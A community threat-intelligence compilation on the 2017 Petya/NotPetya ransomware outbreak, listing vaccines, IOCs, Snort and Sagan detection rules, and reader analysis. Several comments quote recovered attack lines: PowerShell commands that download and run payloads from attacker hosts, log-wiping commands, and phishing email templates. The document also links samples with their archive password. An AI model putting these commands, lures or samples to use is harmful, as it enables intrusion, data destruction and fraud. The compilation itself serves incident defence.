Petya_ransomware.md

#petya #petrWrap #notPetya

Win32/Diskcoder.Petya.C

Ransomware attack.

About

This gist was built by the community of the researchers and was scribed by Kir and Igor from the QIWI/Vulners. We are grateful for the help of all those who sent us the data, links and information. Together we can make this world a better place!

Gist updates

• Got new info? Email at [email protected] or @isox_xx
• Some wrong info? Leave the comment, we will fix it!

Recent news, blog posts and mentions

Recent news from THN/Threatpost/Blogs

Research list

• BI.ZONE
• Positive Technologies
• Talos
• Microsoft
• FireEye
• IBM
• Carbonblack
• Securelist
• Malwarebytes
• HIMSS

Helpful vaccine (not killswitch!)

Looks like if you block C:\Windows\perfc.dat from writing/executing - stops #Petya. Is used for rundll32 import.
https://twitter.com/HackingDave/status/879779361364357121

Local kill switch - create file "C:\Windows\perfc"
It kills WMI vector. Still need to patch MS17-010 for full protection.

Credits:

• HackingDave
• Amit Serper ([email protected])
• Positive Technologies

Group Policy Preferences to deploy the NotPetya vaccine

https://eddwatton.wordpress.com/2017/06/27/use-group-policy-preferences-to-deploy-the-notpetya-vaccine/

SCCM vaccine

https://sccm-zone.com/securing-against-goldeneye-petya-notpetya-petwrap-with-sccm-7e4516da8a81

Ransom

Infected with #Petya? DON'T PAY RANSOM, You wouldn't get your files back. Email used by criminals has been Suspended.

https://posteo.de/blog/info-zur-ransomware-petrwrappetya-betroffenes-postfach-bereits-seit-mittag-gesperrt

Bitcoin wallet monitoring

https://blockchain.info/address/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX

Samples:

• https://yadi.sk/d/QT0l_AYg3KXCqc
• https://yadi.sk/d/S0-ZhPY53KWc84
• https://yadi.sk/d/Zpkm88sp3KWc8v
• https://yadi.sk/d/WemMDKVy3KXPcy

Archive password: virus

Thanks to the https://twitter.com/OxFemale for the initial malware body.

Source code:

• Archive password: virus

Thanks to the @Sn0wFX_:

• svchost.exe
• 027cc450ef5f8c5f653329641ec1fed9.exe in pseudocode
• RTF payload data

Initial vector:

• Ukraine «М.Е. Doc» software
• Additionally, the initial attack vector by FireEye
• Here is the patch that mitigates the attack vector, CVE-2017-0199

Ransomware includes:

• Modified EternalBlue exploit
• A vulnerability in a third-party Ukrainian software product
• A second SMB network exploit

Origin (NO PROOF):

Petya was known to be RaaS (Ransomware-as-a-Service), selling on Tor hidden services. Looks like WannaCry copycat. Attribution will be hard. https://twitter.com/x0rz/status/879733138792099842

AvP Bypass

Confirmed AvP bypasing trick is being used by Petya ransomware to evade 6 popular anti-virus signatures (script) https://twitter.com/hackerfantastic/status/880012620698451968

https://github.com/HackerFantastic/Public/blob/master/tools/bypassavp.sh

Vulnerabilities/Vectors/Actions:

MS17-010

PSEXEC: %PROGRAMDATA%\dllhost.dat is dropped and is legit PSEXEC bin

Remote WMI, “process call create \"C:\\Windows\\System32\\rundll32.exe \\\"C:\\Windows\\perfc.dat\\\" #1”

Log clean, «wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:»

Creates a scheduled task that reboots 1 hour after infection. If task removed before the hour, does not reschedule and can buy time

Petya also attempts to kill Exchange & MySQL if they are running.  If you host either of these services and notice them die, this is including in it's infection process (svchost.exe) // by Mike "Bones" Flowers:

Exec: C:\\windows\\system32\\cmd.exe
Params: /c taskkill.exe /f /im Microsoft.Exchange.*
Exec: C:\\windows\\system32\\cmd.exe
Params: /c taskkill.exe /f /im MSExchange*
Exec: C:\\windows\\system32\\cmd.exe
Params: /c taskkill.exe /f /im sqlserver.exe
Exec: C:\\windows\\system32\\cmd.exe
Params: /c taskkill.exe /f /im sqlwriter.exe
Exec: C:\\windows\\system32\\cmd.exe
Params: /c taskkill.exe /f /im mysqld.exe

The new ransomware can also spread using an exploit for the Server Message Block (SMB) vulnerability CVE-2017-0144 (also known as EternalBlue), which was fixed in security update MS17-010 and was also exploited by WannaCrypt to spread to out-of-date machines. In addition, this ransomware also uses a second exploit for CVE-2017-0145 (also known as EternalRomance, and fixed by the same bulletin)

Machines that are patched against these exploits (with security update MS17-010 https://technet.microsoft.com/en-us/library/security/ms17-010.aspx) or have disabled SMBv1 (https://support.microsoft.com/kb/2696547) are not affected by this particular spreading mechanism

Test local account behavior [NOT TESTED]:

Don't know if you have also noticed, but it only encrypted the MFT records for my test user account profile folders, the default Windows accounts Administrator, default user etc were all untouched, my test account was local so I don't know what behaviour would be expected for domain account profile folders.

100% on the sample used by me and on a standalone computer, user files were encrypted prior to reboot and the malware was not able to escalate privileges to deploy the MFT encryption payload, no instructions were deposited about recovering these files

http://imgur.com/a/FhaZx

Possible IP addresses:

185.165.29.78
84.200.16.242
111.90.139.247
95.141.115.108

Email:

[email protected]
[email protected]         // by WhiteWolfCyber
[email protected]    // by WhiteWolfCyber
[email protected]      // by WhiteWolfCyber
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]

Email forms and attachment:

The subject in this case are formed like that (for targed "[email protected]"):
targed.emailName

The body:
Hello targed.emailName,

You will be billed $ 2,273.42 on your Visa card momentarily.
Go through attachment to avoid it.
Password is 6089

With appreciation!
Prince

Attached file name:
Scan_targed.emailName.doc

Analysis:

• https://virustotal.com/fr/file/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745/analysis/
• https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100
• https://www.hybrid-analysis.com/sample/fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206?environmentId=100
• https://www.hybrid-analysis.com/sample/ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6?environmentId=100
• https://twitter.com/PolarToffee/status/879709615675641856

Targeted extensions by @GasGeverij

.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.

IOCs

securelist.com

0df7179693755b810403a972f4466afb
42b2ff216d14c2c8387c8eabfb1ab7d0
71b6a493388e7d0b40c83ce903bc6b04
e285b6ce047015943e685e6638bd837e
e595c02185d8e12be347915865270cca

blogs.technet.microsoft.com

34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d
9717cfdc2d023812dbc84a941674eb23a2a8ef06
38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf
56c03d8e43f50568741704aee482704a4f5005ad

talosintelligence.com

027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745
eae9771e2eeb7ea3c6059485da39e77b8c0c369232f01334954fbac1c186c998

Droppers sent via email by WhiteWolfCyber:

9B853B8FE232B8DED38355513CFD4F30
CBB9927813FA027AC12D7388720D4771
22053C34DCD54A5E3C2C9344AB47349A702B8CFDB5796F876AEE1B075A670926
1FE78C7159DBCB3F59FF8D410BD9191868DEA1B01EE3ECCD82BCC34A416895B5
EEF090314FBEC77B20E2470A8318FC288B2DE19A23D069FE049F0D519D901B95

Codexgigas team:

a809a63bc5e31670ff117d838522dec433f74bee
bec678164cedea578a7aff4589018fa41551c27f
d5bf3f100e7dbcc434d7c58ebf64052329a60fc2
aba7aa41057c8a6b184ba5776c20f7e8fc97c657
0ff07caedad54c9b65e5873ac2d81b3126754aac
51eafbb626103765d3aedfd098b94d0e77de1196
078de2dc59ce59f503c63bd61f1ef8353dc7cf5f
7ca37b86f4acc702f108449c391dd2485b5ca18c
2bc182f04b935c7e358ed9c9e6df09ae6af47168
1b83c00143a1bb2bf16b46c01f36d53fb66f82b5
82920a2ad0138a2a8efc744ae5849c6dde6b435d

msuice

41f75e5f527a3307b246cadf344d2e07f50508cf75c9c2ef8dc3bae763d18ccf

SNORT rules for the detection by Positive Technologies (ptsecurity.com):

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] Unimplemented Trans2 Sub-Command code. Possible ETERNALBLUE (WannaCry, Petya) tool"; flow: to_server, established; content: "|FF|SMB2|00 00 00 00|"; depth: 9; offset: 4; byte_test: 2, >, 0x0008, 52, relative, little; pcre: "/\xFFSMB2\x00\x00\x00\x00.{52}(?:\x04|\x09|\x0A|\x0B|\x0C|\x0E|\x11)\x00/"; flowbits: set, SMB.Trans2.SubCommand.Unimplemented; reference: url, msdn.microsoft.com/en-us/library/ee441654.aspx; classtype: attempted-admin; sid: 10001254; rev: 2;)

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] ETERNALBLUE (WannaCry, Petya) SMB MS Windows RCE"; flow: to_server, established; content: "|FF|SMB3|00 00 00 00|"; depth: 9; offset: 4; flowbits: isset, SMB.Trans2.SubCommand.Unimplemented.Code0E; threshold: type limit, track by_src, seconds 60, count 1; reference: cve, 2017-0144; classtype: attempted-admin; sid: 10001255; rev: 3;)

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] Trans2 Sub-Command 0x0E. Likely ETERNALBLUE (WannaCry, Petya) tool"; flow: to_server, established; content: "|FF|SMB2|00 00 00 00|"; depth: 9; offset: 4; content: "|0E 00|"; distance: 52; within: 2; flowbits: set, SMB.Trans2.SubCommand.Unimplemented.Code0E; reference: url, msdn.microsoft.com/en-us/library/ee441654.aspx; classtype: attempted-admin; sid: 10001256; rev: 2;)

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] Petya ransomware perfc.dat component"; flow: to_server, established, no_stream; content: "|fe 53 4d 42|"; offset: 4; depth: 4; content: "|05 00|"; offset: 16; depth: 2; byte_jump: 2, 112, little, from_beginning, post_offset 4; content: "|70 00 65 00 72 00 66 00 63 00 2e 00 64 00 61 00 74 00|"; distance:0; classtype:suspicious-filename-detect; sid: 10001443; rev: 1;)

alert tcp any any -> $HOME_NET 445 (msg:"[PT Open] SMB2 Create PSEXESVC.EXE"; flow:to_server, established, no_stream; content: "|fe 53 4d 42|"; offset: 4; depth: 4; content: "|05 00|"; offset: 16; depth: 2; byte_jump: 2, 112, little, from_beginning, post_offset 4; content:"|50 00 53 00 45 00 58 00 45 00 53 00 56 00 43 00 2e 00 45 00 58 00 45|"; distance:0; classtype:suspicious-filename-detect; sid: 10001444; rev:1;)

Sagan log analysis rules for the detection by Quadrant Information Security (quadrantsec.com) - Note: These are NOT Snort/Suricata rules! See http://sagan.io for more details:

alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya payload delivery SHA256 hash detected - Open source"; meta_content: "%sagan%",64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206,ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6,17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd,17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd,e5c643f1d8ecc0fd739d0bbe4a1c6c7de2601d86ab0fff74fd89c40908654be5; meta_nocase; classtype: trojan-activity; reference: url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003121; rev:1;)

alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya payload delivery SHA1 hash detected - Open source"; meta_content: "%sagan%",34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,101cc1cb56c407d5b9149f2c3b8523350d23ba84,a809a63bc5e31670ff117d838522dec433f74bee,d5bf3f100e7dbcc434d7c58ebf64052329a60fc2,aba7aa41057c8a6b184ba5776c20f7e8fc97c657,bec678164cedea578a7aff4589018fa41551c27f,078de2dc59ce59f503c63bd61f1ef8353dc7cf5f,0ff07caedad54c9b65e5873ac2d81b3126754aac,51eafbb626103765d3aedfd098b94d0e77de1196,82920a2ad0138a2a8efc744ae5849c6dde6b435d,1b83c00143a1bb2bf16b46c01f36d53fb66f82b5,7ca37b86f4acc702f108449c391dd2485b5ca18c,2bc182f04b935c7e358ed9c9e6df09ae6af47168,9288fb8e96d419586fc8c595dd95353d48e8a060,736752744122a0b5e
e4b95ddad634dd225dc0f73,9288fb8e96d419586fc8c595dd95353d48e8a060,dd52fcc042a44a2af9e43c15a8e520b54128
cdc8; meta_nocase; classtype: trojan-activity; reference: url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003122; rev:1;)

alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya payload delivery MD5 hash detected - Open source"; meta_content: "%sagan%",71b6a493388e7d0b40c83ce903bc6b04,415fe69bf32634ca98fa07633f4118e1,0487382a4daf8eb9660f1c67e30f8b25,a1d5895f85751dfe67d19cccb51b051a; meta_nocase; classtype: trojan-activity; reference: url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003123; rev:1;)

alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya detected by filename - Open source"; meta_content: "%sagan%",myguy.xls,myguy.exe,BCA9D6.EXE,Order-20062017.doc,myguy.xls.hta; meta_nocase; classtype: trojan-activity; reference: url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003124; rev:1;)

Links

• Has sysinternal utilities signature
• Uses the The GetExtendedTcpTable function to get a list of available endpoints
• List of extensions targeted
• Indicates possible usage of PSEXEC, on windows that means the admin$ and c$ shares.
• It is confirmed that the sample 027cc... contains PSEXEC
• Friends in Ukraine are telling me this helps to recover from Petya (untested)
• Petya— Enhanced WannaCry? What we know so far.
• #Petya uses long #sleep functions: if infected you have 30-40 mins to turn off your computer to save it from ransom.
• Found evidences of post kernel exploitation too: IA32_SYSENTER_EIP after decoding kernel shellcode
• #Petya uses LSADump to get Admin password and infect all network. There is no need for #EternalBlue vulnerable PCs.
• Japan Computer Emergency Response Team Coordination Center Report

Fix suggest by @MrAdz350

If you can boot to a Windows ISO prior to Frist reboot you can use bootrec tool to prevent MBR overwriting as per https://neosmart.net/wiki/fix-mbr

Information about MBRFilter

• http://blog.talosintelligence.com/2016/10/mbrfilter.html
• https://www.talosintelligence.com/mbrfilter
• https://www.youtube.com/watch?v=nLyOi75Wu3A

@vulnersCom
I have tried running the binary on a win7 virtual machine but I get the "not a valid Win32 application" error.

Local kill-switch - create file "C:\Windows\perfc"
https://twitter.com/ptsecurity/status/879779327579086848

That kill switch method only works on the WMI/PSExec. Not full proof.

Snort rules for detection by PT:

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] Unimplemented Trans2 Sub-Command code. Possible ETERNALBLUE (WannaCry, Petya) tool"; flow: to_server, established; content: "|FF|SMB2|00 00 00 00|"; depth: 9; offset: 4; byte_test: 2, >, 0x0008, 52, relative, little; pcre: "/\xFFSMB2\x00\x00\x00\x00.{52}(?:\x04|\x09|\x0A|\x0B|\x0C|\x0E|\x11)\x00/"; flowbits: set, SMB.Trans2.SubCommand.Unimplemented; reference: url, msdn.microsoft.com/en-us/library/ee441654.aspx; classtype: attempted-admin; sid: 10001254; rev: 2;)

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] ETERNALBLUE (WannaCry, Petya) SMB MS Windows RCE"; flow: to_server, established; content: "|FF|SMB3|00 00 00 00|"; depth: 9; offset: 4; flowbits: isset, SMB.Trans2.SubCommand.Unimplemented.Code0E; threshold: type limit, track by_src, seconds 60, count 1; reference: cve, 2017-0144; classtype: attempted-admin; sid: 10001255; rev: 3;)

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] Trans2 Sub-Command 0x0E. Likely ETERNALBLUE (WannaCry, Petya) tool"; flow: to_server, established; content: "|FF|SMB2|00 00 00 00|"; depth: 9; offset: 4; content: "|0E 00|"; distance: 52; within: 2; flowbits: set, SMB.Trans2.SubCommand.Unimplemented.Code0E; reference: url, msdn.microsoft.com/en-us/library/ee441654.aspx; classtype: attempted-admin; sid: 10001256; rev: 2;)

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] Petya ransomware perfc.dat component"; flow: to_server, established, no_stream; content: "|fe 53 4d 42|"; offset: 4; depth: 4; content: "|05 00|"; offset: 16; depth: 2; byte_jump: 2, 112, little, from_beginning, post_offset 4; content: "|70 00 65 00 72 00 66 00 63 00 2e 00 64 00 61 00 74 00|"; distance:0; classtype:suspicious-filename-detect; sid: 10001443; rev: 1;)

alert tcp any any -> $HOME_NET 445 (msg:"[PT Open] SMB2 Create PSEXESVC.EXE"; flow:to_server, established, no_stream; content: "|fe 53 4d 42|"; offset: 4; depth: 4; content: "|05 00|"; offset: 16; depth: 2; byte_jump: 2, 112, little, from_beginning, post_offset 4; content:"|50 00 53 00 45 00 58 00 45 00 53 00 56 00 43 00 2e 00 45 00 58 00 45|"; distance:0; classtype:suspicious-filename-detect; sid: 10001444; rev:1;)

https://github.com/ptresearch/AttackDetection/blob/master/eternalblue(WannaCry%2CPetya)/eternalblue(WannaCry%2CPetya).rules

Nice collection you've got here. Thanks for sharing!

Please add to file information about MBRFilter
http://blog.talosintelligence.com/2016/10/mbrfilter.html
https://www.talosintelligence.com/mbrfilter

https://www.youtube.com/watch?v=nLyOi75Wu3A

The ransomware uses pass the hash techique for attack computers in same active directory or cloned machines.

Twitter Bitcoin Bot Monitoring Petya Payments
https://twitter.com/petya_payments

*********** Sagan log analysis rules for the detection by Quadrant Information Security (quadrantsec.com) - Note: These are NOT Snort/Suricata rules! See http://sagan.io for more details:

alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya payload delivery SHA256 hash detected - Open source"; meta_content: "%sagan%",64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206,ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6,17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd,17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd,e5c643f1d8ecc0fd739d0bbe4a1c6c7de2601d86ab0fff74fd89c40908654be5; meta_nocase; classtype: trojan-activity; reference: url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003121; rev:1;)

alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya payload delivery SHA1 hash detected - Open source"; meta_content: "%sagan%",34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,101cc1cb56c407d5b9149f2c3b8523350d23ba84,a809a63bc5e31670ff117d838522dec433f74bee,d5bf3f100e7dbcc434d7c58ebf64052329a60fc2,aba7aa41057c8a6b184ba5776c20f7e8fc97c657,bec678164cedea578a7aff4589018fa41551c27f,078de2dc59ce59f503c63bd61f1ef8353dc7cf5f,0ff07caedad54c9b65e5873ac2d81b3126754aac,51eafbb626103765d3aedfd098b94d0e77de1196,82920a2ad0138a2a8efc744ae5849c6dde6b435d,1b83c00143a1bb2bf16b46c01f36d53fb66f82b5,7ca37b86f4acc702f108449c391dd2485b5ca18c,2bc182f04b935c7e358ed9c9e6df09ae6af47168,9288fb8e96d419586fc8c595dd95353d48e8a060,736752744122a0b5e
e4b95ddad634dd225dc0f73,9288fb8e96d419586fc8c595dd95353d48e8a060,dd52fcc042a44a2af9e43c15a8e520b54128
cdc8; meta_nocase; classtype: trojan-activity; reference: url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003122; rev:1;)

alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya payload delivery MD5 hash detected - Open source"; meta_content: "%sagan%",71b6a493388e7d0b40c83ce903bc6b04,415fe69bf32634ca98fa07633f4118e1,0487382a4daf8eb9660f1c67e30f8b25,a1d5895f85751dfe67d19cccb51b051a; meta_nocase; classtype: trojan-activity; reference: url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003123; rev:1;)

alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya detected by filename - Open source"; meta_content: "%sagan%",myguy.xls,myguy.exe,BCA9D6.EXE,Order-20062017.doc,myguy.xls.hta; meta_nocase; classtype: trojan-activity; reference: url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003124; rev:1;)

anyone got success to infect win7 vmware machine with the samples?

yes, https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 works (it's dll so you need to use rundll32)

The MBR file is affected, could the cracker could have tried to alter using machine language as hidden/ Trojan kinda attck? Some more reverse engineering is appreciable.

Thanks for the sample, will be decompiling this tonight

Some malicious addresses used to send email with the malicious DOC attached (proofed):

• gabrielai59bjg @ outlook.com
• christagcimrl @ outlook.com
• amparoy982wa @ outlook.com

The subject in this case are formed like that (for targed "[email protected]"):
targed.emailName

The body:
Hello targed.emailName,

You will be billed $ 2,273.42 on your Visa card momentarily.
Go through attachment to avoid it.
Password is 6089

With appreciation!
Prince

Attached file name:
Scan_targed.emailName.doc

christian.malcharzik@gmail[.]com was found to send emails with the file "Order-20062017.doc" (MD5: 415FE69BF32634CA98FA07633F4118E1) as attachment.

We also found @outlook email to our system with the same message with the following payload

cmd.exe /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://185.165.29.78/~alex/svchost.exe' , '%TEMP%\svchost.exe') & PING -n 15 127.0.0.1>nul & %tmp%\svchost.exe

svchost.exe: https://www.virustotal.com/en/file/71f52862cdf708ca203bd07836838fdd41e51473addff1d0b004d8467281bb21/analysis/

Email addresses was
[email protected]
[email protected]

Apparenlty is an automatically generated email: < name ><5 alphanumeric characters>@outlook.com

Had a look at the emails above, only 2 were used elsewhere- https://www.facebook.com/rachel59800 and https://plus.google.com/108180606555454466363

https://twitter.com/msuiche/status/880041005638180864

41f75e5f527a3307b246cadf344d2e07f50508cf75c9c2ef8dc3bae763d18ccf (Len 0x22b0)

Please, add information from https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/

The new ransomware can also spread using an exploit for the Server Message Block (SMB) vulnerability CVE-2017-0144 (also known as EternalBlue), which was fixed in security update MS17-010 and was also exploited by WannaCrypt to spread to out-of-date machines. In addition, this ransomware also uses a second exploit for CVE-2017-0145 (also known as EternalRomance, and fixed by the same bulletin)

Machines that are patched against these exploits (with security update MS17-010 https://technet.microsoft.com/en-us/library/security/ms17-010.aspx) or have disabled SMBv1 (https://support.microsoft.com/kb/2696547) are not affected by this particular spreading mechanism

SCCM vaccine: https://sccm-zone.com/securing-against-goldeneye-petya-notpetya-petwrap-with-sccm-7e4516da8a81

New delivery sender, mail similar to the others.

Sender:
henrietta9u29jd @ outlook.com

The body:
Whats up targed.emailName,

You will be billed $ 3,2629.51 on your Mastercard balance soon.
View attachment to avoid it.
Password is 5558

Kind thanks,
curt

Attached file name:
Scan_targed.emailName.doc

Macro inside:
Creates a bat file in temp withe the following, and then executes.

powershell.exe -w hidden "(New-Object System.Net.WebClient).DownloadFile('http://fbbkvm7ezghq4dx3.onion.link/msbus24.exe','%TEMP%\msbus24.exe')" & %tmp%\msbus24.exe

virus total hash:
4efcabdd8946524ada350a0cafccdba7eba905d345c0a6775c3e29567c2fcdb4

Source:
fbbkvm7ezghq4dx3.onion.link (103.198.0.2)

Tested this malware in closed lab environment. Executed malware in domain joined Windows 7 machine with local administrator. This same local admin account was in other domain machines except one that I configured differently on purpose. Spreads very quickly in network using psexec and wmic. I also had one domain controller and one workgroup Windows 7 machine with different local admin account than other machines. I wanted to see that will it spread to them too using Eternalblue but malware didn't infect them at all for some reason. Those machines didn't have patch for EternalBlue.

Also noted that it didn't create a perfc file in C:\Windows. It created a empty file named petya in C:\Windows. Petya was the name of a file where I originally executed the malware.

Hi! I'm a user of this Medoc software. This April, my Windows Defender found a Trojan:Win32/Rundas.A in Medoc's update package 10.01.168-10.01.169. I have deleted the file and Defender has deleted Trojan. I attach the log of this process, if it can help anyone. I wasn't affected by the attack on 27th June (might be because didn't use Medoc on that day).

Защитник Windows обнаружил вредоносные или иные потенциально нежелательные программы.
Дополнительные сведения см. в:
http://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Rundas.A&threatid=2147717515&enterprise=0
Имя: Trojan:Win32/Rundas.A
ИД: 2147717515
Важность: Критический
Категория: Троян
Путь: file:_C:\Users\User\Documents\ezvit.10.01.168-10.01.169.exe
Происхождение обнаружения: Локальный компьютер
Тип обнаружения: FastPath
Источник обнаружения: Защита в реальном времени:
Пользователь: User-ПК\User
Имя процесса: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
Версия сигнатуры: AV: 1.239.752.0, AS: 1.239.752.0, NIS: 116.88.0.0
Версия модуля: AM: 1.1.13601.0, NIS: 2.1.12706.0

• System

  • Provider
    [ Name] Microsoft-Windows-Windows Defender
    EventID 1116
    Version 0
    Level 3
    Task 0
    Opcode 0
    Keywords 0x8000000000000000
  • TimeCreated
    [ SystemTime] 2017-04-04T14:10:24.714441000Z
    EventRecordID 806
    Correlation
  • Execution
    [ ProcessID] 1764
    [ ThreadID] 3548
    Channel Microsoft-Windows-Windows Defender/Operational
    Computer User-ПК
  • Security
    [ UserID] S-1-5-18

• EventData
  Product Name %%827
  Product Version 4.10.14393.953
  Detection ID {74024D2F-D277-4A2F-972E-A11D4B8B85D0}
  Detection Time 2017-04-04T14:10:23.752Z
  Unused
  Unused2
  Threat ID 2147717515
  Threat Name Trojan:Win32/Rundas.A
  Severity ID 5
  Severity Name Критический
  Category ID 8
  Category Name Троян
  FWLink http://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Rundas.A&threatid=2147717515&enterprise=0
  Status Code 1
  Status Description
  State 1
  Source ID 3
  Source Name %%818
  Process Name C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
  Detection User User-ПК\User
  Unused3
  Path file:_C:\Users\User\Documents\ezvit.10.01.168-10.01.169.exe
  Origin ID 1
  Origin Name %%845
  Execution ID 1
  Execution Name %%813
  Type ID 8
  Type Name %%862
  Pre Execution Status 0
  Action ID 9
  Action Name %%887
  Unused4
  Error Code 0x00000000
  Error Description Операция успешно завершена.
  Unused5
  Post Clean Status 0
  Additional Actions ID 0
  Additional Actions String No additional actions required
  Remediation User
  Unused6
  Signature Version AV: 1.239.752.0, AS: 1.239.752.0, NIS: 116.88.0.0
  Engine Version AM: 1.1.13601.0, NIS: 2.1.12706.0

The 3rd known attack vector is a local news site in Bahmut (Donetsk region):

https://bahmut.com/showpost.php?p=439664&postcount=45

Control server: http://dfkiueswbgfreiwfsd.tk/i/ -> https://ipinfo.io/172.97.69.79 - purevoltage.com VPS, New York

The same server is somehow related to https://www.ukhin.org.ua - institution in Kharkiv (seen in Google):

https://www.ukhin.org.ua/2017Jun12-2017Jun12/192.168.0.35/192.168.0.35.html
Jun 13, 2017 - dfkiueswbgfreiwfsd.tk, 4, 5,400, 0.01%, 0.00%, 100.00%, 01:00:00, 3,600,679, 3.06%. www.odnoklassniki.ru, 4, 5,380, 0.01%, 100.00%, 0.00% ...

Please, add link Analysis of TeleBots’ cunning backdoor (https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/)
and information from post

The backdoored module has the filename ZvitPublishedObjects.dll. This was written using the .NET Framework. It is a 5MB file and contains a lot of legitimate code that can be called by other components, including the main M.E.Doc executable ezvit.exe.

We examined all M.E.Doc updates that were released during 2017, and found that there are at least three updates that contained the backdoored module:
01.175-10.01.176, released on 14th of April 2017
01.180-10.01.181, released on 15th of May 2017
01.188-10.01.189, released on 22nd of June 2017

and

Warning! We recommend changing passwords for proxies, and for email accounts for all users of M.E.Doc software.

Please, change information

